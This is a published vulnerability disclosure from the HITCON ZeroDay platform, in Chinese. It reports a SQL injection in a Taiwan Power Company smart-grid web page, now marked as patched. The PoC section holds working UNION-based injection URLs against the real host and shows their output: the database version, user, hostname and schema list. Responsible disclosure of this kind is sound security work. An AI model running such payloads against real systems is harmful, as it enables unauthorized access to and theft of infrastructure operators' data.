[Bounty] 台灣電力公司 SQL Injection 資料庫注入漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2022-00160
  •  發信 Vendor: 台灣電力公司
  • Title: [Bounty] 台灣電力公司 SQL Injection 資料庫注入漏洞
  • Introduction: SQL Injection 資料庫注入

處理狀態

目前狀態

公開
Last Update : 2022/04/04
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2022/02/25 10:58:48 : 新提交 (由 K4iBr0 更新此狀態)
  • 2022/02/25 11:09:13 : 新提交 (由 K4iBr0 更新此狀態)
  • 2022/02/25 11:09:32 : 新提交 (由 K4iBr0 更新此狀態)
  • 2022/02/26 10:13:58 : 審核中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/03/30 09:14:50 : 複測申請中 (由 組織帳號 更新此狀態)
  • 2022/03/31 11:36:29 : 複測申請中 (由 組織帳號 更新此狀態)
  • 2022/03/31 11:38:59 : 確認已修補 (由 K4iBr0 更新此狀態)
  • 2022/04/04 03:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2022-00160
  • 通報者:Kaibro (K4iBr0)
  • 風險:高
  • 類型:資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://smartgrid.taipower.com.tw/en/page.aspx?mid=23%27and%201=2%20union%20select%201,%27a%27,version(),%27c%27--+

敘述

經測試發現 page.aspx 的 mid 參數存在 MySQL Injection 注入漏洞,可能導致攻擊者透過該弱點取得資料庫中敏感資料

PoC:

https://smartgrid.taipower.com.tw/en/page.aspx?mid=23%27and%201=2%20union%20select%201,%27a%27,version(),%27c%27--+
->
會重跳轉至 https://smartgrid.taipower.com.tw/en/5.7.37-0ubuntu0.18.04.1
其中 5.7.37-0ubuntu0.18.04.1version() 之執行結果

https://smartgrid.taipower.com.tw/en/page.aspx?mid=23%27and%201=2%20union%20select%201,%27a%27,user(),%27c%27--+
->
可取得當前資料庫使用者名: [email protected]

https://smartgrid.taipower.com.tw/en/page.aspx?mid=23%27and%201=2%20union%20select%201,%27a%27,@@hostname,%27c%27--+
->
可取得該資料庫主機之 hostname: workshop-b1-db

https://smartgrid.taipower.com.tw/en/page.aspx?mid=23%27and%201=2%20union%20select%201,%27a%27,(select%20group_concat(schema_name)%20from%20information_schema.schemata),%27c%27--+
->
可取得db name: information_schema,workshop_20200802211804,workshop_20200802213024,workshop_20200802215408,workshop_20200802220501,workshop_20200922055413,workshop_20200926080635,workshop_20210103182026,workshop_20210103183250,workshop_20210107061215,workshop_20210412100041,workshop_20210419014034,workshop_20210531062552,workshop_20210607232923,workshop_2

修補建議

改用 Prepare Statement 方式,避免使用者輸入直接拼接至 SQL 語法,導致注入漏洞發生。

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;